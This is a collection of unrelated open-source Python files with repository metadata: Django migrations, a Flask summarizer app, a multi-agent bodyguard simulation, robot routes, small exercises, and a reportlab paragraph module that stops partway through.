248ae932e96969c1f76bce884663f4cd1e7fdccd | 1238ad2367cbf51246ef21216f3f77398a963268 | /Machine-Learning/scikit-learn/senkei_sample_1.py | 7e4d9f5141874b128205167273934a3a25a2f113 | [] | no_license | shiro16/sunaba | 91c8fb58802993cf428bd2833c4417a234161e49 | 83d62c51a5c35d02cf93de38f6ebf4ab451816e0 | refs/heads/master | 2023-01-28T02:05:01.146155 | 2021-05-11T06:34:36 | 2021-05-11T06:34:36 | 84,282,959 | 0 | 0 | null | 2023-01-08T00:14:46 | 2017-03-08T05:42:13 | Python | UTF-8 | Python | false | false | 560 | py | import numpy as np
import matplotlib.pyplot as plt
from sklearn import linear_model, datasets
# 乱数によるデータ生成
np.random.seed(0)
regdata = datasets.make_regression(100, 1, noise=20.0)
# 学習を行いモデルのパラメータを表示
lin = linear_model.LinearRegression()
lin.fit(regdata[0], regdata[1])
print("coef and intercept : ", lin.coef_, lin.intercept_)
print("score :", lin.score(regdata[0], regdata[1]))
# グラフ
xr = [-2.5, 2.5]
plt.plot(xr, lin.coef_ * xr + lin.intercept_)
plt.scatter(regdata[0], regdata[1])
plt.show()
| [
"[email protected]"
] | |
c209bbaacb59462c92f86852c6966232dfbf4d38 | 2c3404d57a64e52bb860b59445e48a6cf4537bc6 | /backend/services/migrations/0003_auto_20210502_1837.py | d5b91cd5d6d2ba633c5270a8f3f6263dbe68ffd6 | [] | no_license | miyou995/octosite | 42ef627c0d8378b007d9bad1333768428cc6ec2e | 362f5013a48fb7cd54a4cae84aed58da8fbb4388 | refs/heads/master | 2023-07-07T10:21:52.985355 | 2021-08-05T07:36:04 | 2021-08-05T07:36:04 | 392,947,907 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,306 | py | # Generated by Django 3.0.7 on 2021-05-02 17:37
from django.db import migrations, models
import django.db.models.deletion
class Migration(migrations.Migration):
dependencies = [
('services', '0002_auto_20210502_1438'),
]
operations = [
migrations.CreateModel(
name='ServiceCategory',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('name', models.CharField(max_length=200, verbose_name='Nom Catégorie')),
('slug', models.SlugField(max_length=200, unique=True, verbose_name='Slug')),
('description', models.CharField(max_length=400)),
('icon_url', models.CharField(max_length=250)),
],
options={
'verbose_name': 'Catégorie',
'verbose_name_plural': 'Catégories',
'ordering': ('name',),
},
),
migrations.AlterField(
model_name='service',
name='category',
field=models.ForeignKey(on_delete=django.db.models.deletion.PROTECT, to='services.ServiceCategory', verbose_name='Catégorie'),
),
migrations.DeleteModel(
name='Category',
),
]
| [
"[email protected]"
] | |
71c9b1d33046a6ad3c060c4f3e76ee5cf4280b26 | 36073b3c349eb6887a03b8f90b39ebd54fa3deb3 | /cadastros/urls.py | 225b7457bf5f7a4bb5dc7949f740bd6c6c5f567f | [] | no_license | evertonpauli/e-ticket | 6ba29a3d4a0b3dc2841a5db470e2c717315e8450 | 066cf48e70dec425aeaaa7aeefd617ffd1616307 | refs/heads/master | 2023-04-30T10:54:13.013547 | 2019-08-15T13:12:45 | 2019-08-15T13:12:45 | 202,204,800 | 0 | 0 | null | 2023-04-21T20:36:51 | 2019-08-13T18:42:22 | Python | UTF-8 | Python | false | false | 328 | py | from rest_framework import routers
from cadastros.views import ClientesViewSet, CategoriaViewSet, StatusViewSet
router = routers.DefaultRouter(trailing_slash=True)
router.register('clientes', ClientesViewSet)
router.register('categorias', CategoriaViewSet)
router.register('status', StatusViewSet)
urlpatterns = router.urls
| [
"[email protected]"
] | |
5f521276c2d1adbf2aab4331c07f24c57d0c44ad | 53a1e00175aad8bb9bc9d93c47a3e12eeffb7c67 | /account/migrations/0038_auto_20200917_0120.py | 607a62545d691cc8c088b0f011d46c375bd3a602 | [] | no_license | mirsisir/flash | c363d748725ebf4c5bbce9f03cbaafe32f768e9e | 42d73be32fd29ab4592ccaca3c03b786223fc902 | refs/heads/master | 2022-12-26T08:02:54.927235 | 2020-10-03T08:32:24 | 2020-10-03T08:32:24 | 300,835,641 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 353 | py | # Generated by Django 3.0.8 on 2020-09-17 01:20
from django.db import migrations
class Migration(migrations.Migration):
dependencies = [
('account', '0037_auto_20200917_0100'),
]
operations = [
migrations.AlterModelOptions(
name='order',
options={'ordering': ('-order_date1',)},
),
]
| [
"[email protected]"
] | |
65757a625f7f8aafc159219b1ac837edf8deab90 | a251f675c1083e857d9f612a3bef9c6745d6b1b9 | /chapter12_async_IO_coroutine/yield_from_how.py | 45e7a864accdeeb55778cd38383ed8bfe7a2f6fa | [] | no_license | haokr/PythonProgramming_Advanced | 6319e5bb4a82944c11d83e1095e2aa37cb217bd9 | 472da8407828f53be3cc3d1153ac9b795f6a9a45 | refs/heads/master | 2022-04-01T22:02:10.364678 | 2020-02-09T08:07:55 | 2020-02-09T08:07:55 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,304 | py | # -*- coding: utf-8 -*-
'''
* @Author: WangHao
* @Date: 2020-01-12 09:47:40
* @LastEditors: WangHao
* @LastEditTime: 2020-01-12 10:07:08
* @Description: None
'''
'''
总结:
1. 子生成器生产的值,都是直接传给调用方:调用方通过.send()发送的值都是直接传给子生成器的,如果发送的是None,会调用子生成器的__next__()方法,如果不是None,调用子生成器的send()方法。
2. 子生成器退出的时候,最后的return EXPR,会触发一个StopIteration(EXPR)异常;
3. yield from表达式的值,是子生成器终止时,传递给StopIteration异常的第一个参数;
4. 如果调用的时候出现StopIteration异常,委托生成器也会恢复运行,同时其他的异常会向上冒泡;
5. 传入委托生成器的异常里,除了GeneratorExit之外,其他的所有异常全都传递给子生成器的throw()方法,如果调用throw的时候出现了StopIteration异常,那么就恢复委托生成器的运行,其他的异常全部向上冒泡;
6. 如果在委托生成器上调用close()或传入GeneratorExit异常,会调用子生成器的close()方法,没有的话不调用,如果在调用的时候出现异常那么就向上冒泡,否则的话委托生成器会抛出GeneratorExit异常。
''' | [
"[email protected]"
] | |
a43d5a84086bb4be7ba32c8067fcbd249315d7db | 929ce0470f5e9ce8ed7cabdfbcfa73c0b5b35d30 | /settings.py | 5d117541ecb60c1cac53f43154299046e18f055c | [] | no_license | milesgranger/cmdata | 2ee96706a61372c94955e0fd942e777149249e2c | 535b237af99d988e158ab8b5304d0d1340b7f908 | refs/heads/master | 2020-04-06T07:08:27.252382 | 2016-09-11T10:25:42 | 2016-09-11T10:25:42 | 65,610,733 | 0 | 1 | null | 2016-09-11T10:25:43 | 2016-08-13T09:44:49 | Python | UTF-8 | Python | false | false | 866 | py | import os
import logging
import json
from peewee import Model, SqliteDatabase
with open('settings.json', 'r') as myfile:
json_settings = json.loads(myfile.read())
logger = logging.getLogger(__name__)
logger.setLevel(logging.DEBUG)
SECRET_KEY = json_settings["SECRET_KEY"]
DEBUG = json_settings["DEBUG"]
#######################
### DATABASE CONFIG ###
#######################
DB_URI = json_settings['DATABASE']
DATABASE = SqliteDatabase(DB_URI, threadlocals=True)
class BaseModel(Model):
'''
Base class for all other DB Models
Basically defines which database to use
'''
class Meta:
database = DATABASE
#######################
### PATHS #############
#######################
ROOT_DIR = os.path.dirname(os.path.abspath(__file__))
STATIC_DIR = os.path.join(ROOT_DIR, 'static')
TEMPLATES_DIR = os.path.join(ROOT_DIR, 'templates')
| [
"[email protected]"
] | |
794f234132b9911b2627c4d8a81cf9092ef9550b | 7751c53180eb5eda2c9ff6f1406d755733d7a3a0 | /multiagent/agents/bystander.py | 4f63775706930f75b6101b4a5bb89072ffa5e9a0 | [
"MIT"
] | permissive | HassamSheikh/VIP_Protection_Envs | b2927de19565c6fb09d1db42105ea4defc7aa912 | ea8b4f702d037336812035abbf8aaa12e26f8c46 | refs/heads/master | 2020-07-14T01:32:15.620448 | 2019-08-29T18:03:45 | 2019-08-29T18:03:45 | 205,201,943 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 6,809 | py | import numpy as np
from . import *
class Bystander(Participant):
""" A bystander (crowd participant) in the bodyguard environment, performing a movement that involves visiting random landmarks. If the bystander is near a bodyguard, it stops...
"""
def __init__(self, scenario):
super().__init__(scenario)
self.action_callback = self.theaction
self.color = np.array([0.8, 0.0, 0.0]) # red
self.state.p_pos = np.random.uniform(-1,+1, scenario.world.dim_p)
self.state.p_vel = np.zeros(scenario.world.dim_p)
self.goal_a = None
self.wait_count = 0
def reset(self):
super(Bystander, self).reset()
self.goal_a=None
def theaction(self, agent, world):
""" The behavior of the bystanders. Implemented as callback function
"""
# If the agent finds itself out of range, jump to a random new location
if self.out_of_bounds():
self.reset()
bystander_action = Action()
# The bystanders freeze if they are near a bodyguard or have no goal
if self.near_bodyguard(agent, world) or not self.goal_a:
bystander_action.u = np.zeros(world.dim_p)
self.wait_count += 1
if self.wait_count > 50:
agent.goal_a = self.nearest_landmark(world)
relative_position = (agent.goal_a.state.p_pos - agent.state.p_pos)
bystander_action.u = (relative_position/np.linalg.norm(relative_position))
self.wait_count = 0
return bystander_action
# If the agent reached its goal, picks a new goal randomly from the landmarks
if self.reached_goal():
agent.goal_a = np.random.choice(world.landmarks)
# otherwise, move towards the landmark
relative_position = (agent.goal_a.state.p_pos - agent.state.p_pos)
bystander_action.u = (relative_position/np.linalg.norm(relative_position)) * self.step_size
return bystander_action
def near_bodyguard(self, agent, world):
bodyguard_p_pos = np.asarray([bodyguard.state.p_pos for bodyguard in self.scenario.bodyguards])
distance_between_all_bodyguards = np.linalg.norm(bodyguard_p_pos-agent.state.p_pos, axis=1)
return np.any(0.3 > distance_between_all_bodyguards)
def nearest_landmark(self, world):
landmark_p_pos = np.array([landmark.state.p_pos for landmark in world.landmarks])
idx = np.linalg.norm(landmark_p_pos-self.state.p_pos, axis=1).argsort()[0]
return world.landmarks[idx]
class StreetBystander(Bystander):
""" A bystander (crowd participant) in the bodyguard environment, performing Vicsek Particle Motion. If the bystander is near a bodyguard, it stops...
"""
def __init__(self, scenario):
super().__init__(scenario)
self.action_callback = self.theaction
self.theta = np.random.uniform(-np.pi,np.pi)
self.noise = np.random.rand()
def reset(self):
""" Reset the states of an agent """
self.state.p_vel = np.random.uniform(-.5, .5, self.scenario.world.dim_p)
self.theta=np.random.uniform(-np.pi,np.pi)
def theaction(self, agent, world):
""" The behavior of the bystanders. Implemented as callback function
"""
#print("bystander action")
# If the agent finds itself out of range, jump to a random new location
bystander_action = Action()
#The bystanders freeze if they are near a bodyguard
if self.near_bodyguard(agent, world) or self.out_of_bounds():
bystander_action.u = np.array([-0.2, -0.2])
return bystander_action
# otherwise, move towards the landmark
relative_position= (self.vicsek_step() - agent.state.p_pos)
bystander_action.u = (relative_position/np.linalg.norm(relative_position))
return bystander_action
def near_bodyguard(self, agent, world):
bodyguard_p_pos = np.asarray([bodyguard.state.p_pos for bodyguard in self.scenario.bodyguards])
distance_between_all_bodyguards = np.linalg.norm(bodyguard_p_pos-agent.state.p_pos, axis=1)
return np.any(0.1 > distance_between_all_bodyguards)
def vicsek_step(self):
noise_increments = (self.noise - 0.5)
bystander_p_pos = np.asarray([bystander.state.p_pos for bystander in self.scenario.bystanders])
distance_between_all_crowd = np.linalg.norm(bystander_p_pos-self.state.p_pos, axis=1)
np.nan_to_num(distance_between_all_crowd, False)
near_range_bystanders = np.where((distance_between_all_crowd > 0) & (distance_between_all_crowd <=1.5))[0].tolist()
near_angles = [self.scenario.bystanders[idx].theta for idx in near_range_bystanders]
near_angles = np.array(near_angles)
mean_directions = np.arctan2(np.mean(np.sin(near_angles)), np.mean(np.cos(near_angles)))
self.theta = mean_directions + noise_increments
vel = np.multiply([np.cos(self.theta), np.sin(self.theta)], self.state.p_vel)
position = self.state.p_pos + (vel * 0.15)
if not ((-self.scenario.env_range <= position[0] <= self.scenario.env_range) and (-self.scenario.env_range <= position[1] <= self.scenario.env_range)):
return copy.deepcopy(self.state.p_pos + .1)
return np.clip(position, -1, 1)
class HostileBystander(Bystander):
"""A Hostile Bystander"""
def __init__(self, scenario):
super().__init__(scenario)
self.action_callback = None
#self.color = np.array([0.8, 0.0, 1.1])
def observation(self):
"""returns the observation of a hostile bystander"""
other_pos = []
other_vel = []
for other in self.scenario.world.agents:
if other is self: continue
other_pos.append(other.state.p_pos - self.state.p_pos)
other_vel.append(other.state.p_vel)
return np.concatenate([self.state.p_vel] + other_pos + other_vel)
def reward(self, world):
"""Reward for Hostile Bystander for being a threat to the VIP"""
vip_agent = self.scenario.vip_agent
rew = Threat(vip_agent, self.scenario.bodyguards, [self]).calculate_residual_threat_at_every_step()
bodyguards = self.scenario.bodyguards
for bodyguard in bodyguards:
rew += 0.1 * self.distance(bodyguard)
if self.is_collision(bodyguard):
rew -= 10
if self.is_collision(vip_agent):
rew += 10
def bound(x):
if x < 0.9:
return 0
if x < 1.0:
return (x - 0.9) * 10
return min(np.exp(2 * x - 2), 10)
for p in range(world.dim_p):
x = abs(self.state.p_pos[p])
rew -= bound(x)
return rew
| [
"[email protected]"
] | |
d1878d336619c62c219f42222f728c8e4ed65c83 | 7d768b5be4213c3ac90648d48d1a322fb8c5c433 | /python_code/chuanzhi/python_advance/19/process_pool.py | e42b0da91f0fd4f73e665517b8f08d73f03c0eeb | [] | no_license | googleliyang/gitbook_cz_python | 7da5070b09e760d5e099aeae468c08e705b7da78 | c82b7d435dc11016e24cde2bdc4a558f507cb668 | refs/heads/master | 2020-04-02T17:47:58.400424 | 2018-12-22T09:48:59 | 2018-12-22T09:48:59 | 154,672,309 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 111 | py | #!/usr/bin/env python3
# -*- coding: utf-8 -*-
# @File : process_pool.py
# @Author: ly
# @Date : 2018/12/8
| [
"[email protected]"
] | |
83319329ae3deb480ae7390407f2049fa217f9a8 | 03d29ea4bc9a0e302d6000947b5d70b17ebfdec5 | /games/hipixel.py | 75a9f1a40f443db7829006ae08d5b8ccc5799813 | [] | no_license | Tim232/GameWatcherBot | 0abc05657b5768db18c78ecbe8c9bee89169145e | aa60c0997928ea26d63b770d1dd55b208529f80f | refs/heads/main | 2023-03-04T13:52:27.690345 | 2021-02-16T12:31:39 | 2021-02-16T12:31:39 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 584 | py | import requests
import json
import os
import sys
sys.path.append(os.path.dirname(os.path.abspath(os.path.dirname(__file__))))
#import bot
key, player_uuid = '', ''
with open('../settings.json', 'r') as f:
hipixel_settings = json.load(f)["hipixel"]
key = hipixel_settings["key"]
player_uuid = hipixel_settings["player_uuid"]
url = 'https://api.hypixel.net/status?key=' + key + '&uuid=' + player_uuid
html = requests.get(url)
result = json.loads(html.text)
#bot.client.get_channel(channel_id)
if result['session']['online']: print('온라인')
else: print('오프라인') | [
"[email protected]"
] | |
bf9f3b6aa1efcc20fe3d0f874b18a994c50a5c78 | 9c84d806af445c9998f3145f07efe5d30b91c815 | /users/migrations/0001_initial.py | f6e88219a642508d9b52bb956e3e985136460980 | [] | no_license | naman114/Django_Blog | c065e50b7e6184e69bc4e2ac19b36c98d6084aea | c97eb63fd4d67df4638ab5766ee76cd5e39023ea | refs/heads/master | 2023-04-18T03:15:47.368787 | 2021-05-04T00:36:02 | 2021-05-04T00:36:02 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 777 | py | # Generated by Django 3.1.7 on 2021-03-30 20:09
from django.conf import settings
from django.db import migrations, models
import django.db.models.deletion
class Migration(migrations.Migration):
initial = True
dependencies = [
migrations.swappable_dependency(settings.AUTH_USER_MODEL),
]
operations = [
migrations.CreateModel(
name='Profile',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('image', models.ImageField(default='default.jpg', upload_to='profile_pics')),
('user', models.OneToOneField(on_delete=django.db.models.deletion.CASCADE, to=settings.AUTH_USER_MODEL)),
],
),
]
| [
"[email protected]"
] | |
56db26ac23eb5330f73c013d50f5c5683be26524 | ee3ededc11e224619506d39c95cd4c8a150b9ffc | /run/migrations/0022_auto_20210610_0543.py | c9d3e8ffae0d8ff5ddf7955fc8397c7651b14ea5 | [] | no_license | TwoPointFour/django-backend | 5b37b11c63c5f7b061d323af191dd7cc725c885c | fd41da863df4cf79e5c8f9af2b211d6628ab6651 | refs/heads/main | 2023-08-11T14:01:39.604186 | 2021-09-27T05:04:13 | 2021-09-27T05:04:13 | 377,231,515 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 626 | py | # Generated by Django 3.2.3 on 2021-06-09 21:43
from django.db import migrations, models
import run.models
class Migration(migrations.Migration):
dependencies = [
('run', '0021_alter_workoutlog_workouts'),
]
operations = [
migrations.AddField(
model_name='profile',
name='alias',
field=models.CharField(blank=True, max_length=50),
),
migrations.AlterField(
model_name='profile',
name='profileImage',
field=models.ImageField(default='default/default.jpg', upload_to=run.models.upload_to),
),
]
| [
"[email protected]"
] | |
c6eafbbe4676917c6f23a05bc73e21e549c0ba3f | 43842089122512e6b303ebd05fc00bb98066a5b2 | /dynamic_programming/120_triangle.py | 99985fab0c45baef506be9737699a9531b32e925 | [] | no_license | mistrydarshan99/Leetcode-3 | a40e14e62dd400ddb6fa824667533b5ee44d5f45 | bf98c8fa31043a45b3d21cfe78d4e08f9cac9de6 | refs/heads/master | 2022-04-16T11:26:56.028084 | 2020-02-28T23:04:06 | 2020-02-28T23:04:06 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,507 | py | """
Given a triangle, find the minimum path sum from top to bottom. Each step you may move to adjacent numbers on the row below.
For example, given the following triangle
[
[2],
[3,4],
[6,5,7],
[4,1,8,3]
]
The minimum path sum from top to bottom is 11 (i.e., 2 + 3 + 5 + 1 = 11).
"""
class Solution(object):
def minimumTotal_1(self, triangle):
"""
:type triangle: List[List[int]]
:rtype: int
"""
result = []
for line in range(1, len(triangle)):
result.append([0] * line)
result.append(triangle[-1])
for i in reversed(range(len(triangle))):
for j in range(i):
result[i - 1][j] = min(result[i][j], result[i][j+1]) + triangle[i - 1][j]
return result[0][0]
def minimumTotal_2(self, triangle):
# modify the triangle in place
if not triangle:
return
for i in range(len(triangle)-2, -1, -1):
for j in range(len(triangle[i])):
triangle[i][j] = min(triangle[i+1][j], triangle[i+1][j+1]) + triangle[i][j]
return triangle[0][0]
def minimumTotal_3(self, triangle):
# O(n) space
if not triangle:
return
result = triangle[-1]
for i in range(len(triangle) - 2, -1, -1):
for j in range(len(triangle[i])):
result[j] = min(result[j], result[j+1]) + triangle[i][j]
return result[0]
triangle_1 = [[2],[3,4],[6,5,7],[4,1,8,3]]
| [
"[email protected]"
] | |
0acae82186a9621c166aec6bb0d254ebb92b1f81 | 818dae742767ca890779c208d0e71292c9c688c8 | /app.py | ee11cfae74e172e2a4288e1f931afd1cc7937f75 | [] | no_license | mnassrib/text-summarizer-app | f128eda50b2dfa620f6f6bba46942ecb487c5f2f | 3c97606497dc9e933ee0bb086a58be3cb4a678f1 | refs/heads/master | 2022-07-28T18:01:28.673292 | 2020-05-19T23:53:08 | 2020-05-19T23:53:08 | 265,273,408 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 3,995 | py | from __future__ import unicode_literals
from flask import Flask, render_template, url_for, request
from spacy_summarization import text_summarizer
from gensim.summarization import summarize
from nltk_summarization import nltk_summarizer
import time
import spacy
import en_core_web_sm
nlp = en_core_web_sm.load()
app = Flask(__name__)
# Web Scraping Pkg
from bs4 import BeautifulSoup
from urllib.request import urlopen
#from urllib import urlopen
# Sumy Pkg
from sumy.parsers.plaintext import PlaintextParser
from sumy.nlp.tokenizers import Tokenizer
from sumy.summarizers.lex_rank import LexRankSummarizer
# Sumy
def sumy_summary(docx):
parser = PlaintextParser.from_string(docx,Tokenizer("english"))
lex_summarizer = LexRankSummarizer()
summary = lex_summarizer(parser.document,3)
summary_list = [str(sentence) for sentence in summary]
result = ' '.join(summary_list)
return result
# Reading Time
def readingTime(mytext):
total_words = len([ token.text for token in nlp(mytext)])
estimatedTime = total_words/200.0
return estimatedTime
# Fetch Text From Url
def get_text(url):
page = urlopen(url)
soup = BeautifulSoup(page)
fetched_text = ' '.join(map(lambda p:p.text,soup.find_all('p')))
return fetched_text
@app.route('/')
def index():
return render_template('index.html')
@app.route('/analyze', methods=['GET','POST'])
def analyze():
start = time.time()
if request.method == 'POST':
rawtext = request.form['rawtext']
final_reading_time = "{:.3f}".format(readingTime(rawtext))
final_summary = text_summarizer(rawtext)
summary_reading_time = "{:.3f}".format(readingTime(final_summary))
end = time.time()
final_time = "{:.3f}".format(end-start)
return render_template('index.html',ctext=rawtext,final_summary=final_summary,final_time=final_time,final_reading_time=final_reading_time,summary_reading_time=summary_reading_time)
@app.route('/analyze_url', methods=['GET','POST'])
def analyze_url():
start = time.time()
if request.method == 'POST':
raw_url = request.form['raw_url']
rawtext = get_text(raw_url)
final_reading_time = "{:.3f}".format(readingTime(rawtext))
final_summary = text_summarizer(rawtext)
summary_reading_time = "{:.3f}".format(readingTime(final_summary))
end = time.time()
final_time = "{:.3f}".format(end-start)
return render_template('index.html',ctext=rawtext,final_summary=final_summary,final_time=final_time,final_reading_time=final_reading_time,summary_reading_time=summary_reading_time)
@app.route('/compare_summary')
def compare_summary():
return render_template('compare_summary.html')
@app.route('/comparer', methods=['GET','POST'])
def comparer():
start = time.time()
if request.method == 'POST':
rawtext = request.form['rawtext']
final_reading_time = "{:.3f}".format(readingTime(rawtext))
final_summary_spacy = text_summarizer(rawtext)
summary_reading_time = "{:.3f}".format(readingTime(final_summary_spacy))
# Gensim Summarizer
final_summary_gensim = summarize(rawtext)
summary_reading_time_gensim = "{:.3f}".format(readingTime(final_summary_gensim))
# NLTK
final_summary_nltk = nltk_summarizer(rawtext)
summary_reading_time_nltk = "{:.3f}".format(readingTime(final_summary_nltk))
# Sumy
final_summary_sumy = sumy_summary(rawtext)
summary_reading_time_sumy = "{:.3f}".format(readingTime(final_summary_sumy))
end = time.time()
final_time = "{:.3f}".format(end-start)
return render_template('compare_summary.html',ctext=rawtext,final_summary_spacy=final_summary_spacy,final_summary_gensim=final_summary_gensim,final_summary_nltk=final_summary_nltk,final_time=final_time,final_reading_time=final_reading_time,summary_reading_time=summary_reading_time,summary_reading_time_gensim=summary_reading_time_gensim,final_summary_sumy=final_summary_sumy,summary_reading_time_sumy=summary_reading_time_sumy,summary_reading_time_nltk=summary_reading_time_nltk)
@app.route('/about')
def about():
return render_template('index.html')
if __name__ == '__main__':
app.run(debug=True) | [
"[email protected]"
] | |
81f5eb7112b4fddb2b1def7dd9e93b220c6f3982 | 06905fd703d600f95f7a21dfe8e102b26df05921 | /mmsite/wsgi.py | eeab6b532485c7681a3e40ee26925807b14b17ee | [] | no_license | NmrTannhauser/marketmaker | 5fa722962b7a3300967378970ddb9d572d254b38 | 87761de0187b1ae65236d7f968eaeb9a43f23c07 | refs/heads/master | 2020-03-14T16:35:28.388404 | 2018-05-28T16:14:41 | 2018-05-28T16:14:41 | 131,701,070 | 0 | 1 | null | null | null | null | UTF-8 | Python | false | false | 390 | py | """
WSGI config for mmsite project.
It exposes the WSGI callable as a module-level variable named ``application``.
For more information on this file, see
https://docs.djangoproject.com/en/1.11/howto/deployment/wsgi/
"""
import os
from django.core.wsgi import get_wsgi_application
os.environ.setdefault("DJANGO_SETTINGS_MODULE", "mmsite.settings")
application = get_wsgi_application()
| [
"[email protected]"
] | |
03ff755a26f0ca8650026e3ea508c2e1a76f5a1c | 73e4f50d2aabaf630e3a6154f3a149f6dee22656 | /apps/users/migrations/0003_auto_20170124_1008.py | 57a0420da15f1ec3aac5a6b35f833671e6d0a2c2 | [] | no_license | gjw199513/Mxonline | 508f8878eba396de1a88903c148a2f32641d9d8f | 360b759a0d21d712f3588c6fec377aabc2f990e0 | refs/heads/master | 2022-11-28T14:25:19.268436 | 2017-12-22T09:23:01 | 2017-12-22T09:23:31 | 80,403,072 | 4 | 2 | null | null | null | null | UTF-8 | Python | false | false | 491 | py | # -*- coding: utf-8 -*-
# Generated by Django 1.10.5 on 2017-01-24 10:08
from __future__ import unicode_literals
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
('users', '0002_auto_20170124_1007'),
]
operations = [
migrations.AlterField(
model_name='userprofile',
name='mobile',
field=models.CharField(blank=True, default=None, max_length=11, null=True),
),
]
| [
"gjw605134015"
] | gjw605134015 |
c58de3d099facdaa74fbc9362cf2b4d91bbdac3f | 297c6d7f0c15538349e2854c93a9b672836f433a | /routes/route4.py | 9db70781388939fe05282160420b8e727089cc97 | [] | no_license | Utklossning/ev3-robot | 5dec26e72b870589909acfe4a23862930b4a3112 | 1830c19e3406521f3384256137ec7c6e969ed3c0 | refs/heads/master | 2020-04-05T09:47:25.332861 | 2018-11-19T07:37:14 | 2018-11-19T07:37:14 | 156,774,626 | 0 | 0 | null | 2018-11-17T09:10:17 | 2018-11-08T22:01:21 | Python | UTF-8 | Python | false | false | 664 | py | import time
class Route():
def __init__(self, bot):
self.bot = bot
self.route_number = "four"
def start(self):
self.bot.move_forward(45, 50)
self.bot.rotate_right(45, 50)
self.bot.move_forward(44, 50)
self.bot.rotate_right(46, 50)
self.bot.move_forward(28, 50)
self.bot.detect_red_tape()
self.bot.empty_container()
self.bot.move_backward(35, 75)
self.bot.rotate_left(46, 50)
self.bot.move_backward(44, 75)
self.bot.rotate_left(37, 50)
self.bot.move_backward(57, 75)
return True
| [
"[email protected]"
] | |
7dd79a81c2691091fdf63dedb45319a7eae1a591 | 0fb12be061ab050904ceea99f6a938985a0d8acf | /report_mako2pdf/lib/xhtml2pdf/reportlab_paragraph.py | eba9e9aa506f6c2e6a82f44c220787a1075fbb14 | [] | no_license | libermatos/Openerp_6.1 | d17fbff1f35948e0c4176e2ed34ac5d7f8453834 | 510df13df7ea651c055b408ad66c580ca29d4ad7 | refs/heads/master | 2023-06-19T00:24:36.002581 | 2021-07-07T01:17:20 | 2021-07-07T01:17:20 | 383,574,889 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 71,161 | py | # -*- coding: utf-8 -*-
# Copyright ReportLab Europe Ltd. 2000-2008
# see license.txt for license details
# history http://www.reportlab.co.uk/cgi-bin/viewcvs.cgi/public/reportlab/trunk/reportlab/platypus/paragraph.py
# Modifications by Dirk Holtwick, 2008
from string import join, whitespace
from operator import truth
from reportlab.pdfbase.pdfmetrics import stringWidth, getAscentDescent
from reportlab.platypus.paraparser import ParaParser
from reportlab.platypus.flowables import Flowable
from reportlab.lib.colors import Color
from reportlab.lib.enums import TA_LEFT, TA_RIGHT, TA_CENTER, TA_JUSTIFY
from reportlab.lib.textsplit import ALL_CANNOT_START
from copy import deepcopy
from reportlab.lib.abag import ABag
import re
PARAGRAPH_DEBUG = False
LEADING_FACTOR = 1.0
_wsc_re_split = re.compile('[%s]+' % re.escape(''.join((
u'\u0009', # HORIZONTAL TABULATION
u'\u000A', # LINE FEED
u'\u000B', # VERTICAL TABULATION
u'\u000C', # FORM FEED
u'\u000D', # CARRIAGE RETURN
u'\u001C', # FILE SEPARATOR
u'\u001D', # GROUP SEPARATOR
u'\u001E', # RECORD SEPARATOR
u'\u001F', # UNIT SEPARATOR
u'\u0020', # SPACE
u'\u0085', # NEXT LINE
#u'\u00A0', # NO-BREAK SPACE
u'\u1680', # OGHAM SPACE MARK
u'\u2000', # EN QUAD
u'\u2001', # EM QUAD
u'\u2002', # EN SPACE
u'\u2003', # EM SPACE
u'\u2004', # THREE-PER-EM SPACE
u'\u2005', # FOUR-PER-EM SPACE
u'\u2006', # SIX-PER-EM SPACE
u'\u2007', # FIGURE SPACE
u'\u2008', # PUNCTUATION SPACE
u'\u2009', # THIN SPACE
u'\u200A', # HAIR SPACE
u'\u200B', # ZERO WIDTH SPACE
u'\u2028', # LINE SEPARATOR
u'\u2029', # PARAGRAPH SEPARATOR
u'\u202F', # NARROW NO-BREAK SPACE
u'\u205F', # MEDIUM MATHEMATICAL SPACE
u'\u3000', # IDEOGRAPHIC SPACE
)))).split
def split(text, delim=None):
if type(text) is str:
text = text.decode('utf8')
if type(delim) is str:
delim = delim.decode('utf8')
elif delim is None and u'\xa0' in text:
return [uword.encode('utf8') for uword in _wsc_re_split(text)]
return [uword.encode('utf8') for uword in text.split(delim)]
def strip(text):
if type(text) is str:
text = text.decode('utf8')
return text.strip().encode('utf8')
class ParaLines(ABag):
"""
class ParaLines contains the broken into lines representation of Paragraphs
kind=0 Simple
fontName, fontSize, textColor apply to whole Paragraph
lines [(extraSpace1,words1),....,(extraspaceN,wordsN)]
kind==1 Complex
lines [FragLine1,...,FragLineN]
"""
class FragLine(ABag):
"""
class FragLine contains a styled line (ie a line with more than one style)::
extraSpace unused space for justification only
wordCount 1+spaces in line for justification purposes
words [ParaFrags] style text lumps to be concatenated together
fontSize maximum fontSize seen on the line; not used at present,
but could be used for line spacing.
"""
#our one and only parser
# XXXXX if the parser has any internal state using only one is probably a BAD idea!
_parser = ParaParser()
def _lineClean(L):
return join(filter(truth, split(strip(L))))
def cleanBlockQuotedText(text, joiner=' '):
"""This is an internal utility which takes triple-
quoted text form within the document and returns
(hopefully) the paragraph the user intended originally."""
L = filter(truth, map(_lineClean, split(text, '\n')))
return join(L, joiner)
def setXPos(tx, dx):
if dx > 1e-6 or dx < -1e-6:
tx.setXPos(dx)
def _leftDrawParaLine(tx, offset, extraspace, words, last=0):
setXPos(tx, offset)
tx._textOut(join(words), 1)
setXPos(tx, -offset)
return offset
def _centerDrawParaLine(tx, offset, extraspace, words, last=0):
m = offset + 0.5 * extraspace
setXPos(tx, m)
tx._textOut(join(words), 1)
setXPos(tx, -m)
return m
def _rightDrawParaLine(tx, offset, extraspace, words, last=0):
m = offset + extraspace
setXPos(tx, m)
tx._textOut(join(words), 1)
setXPos(tx, -m)
return m
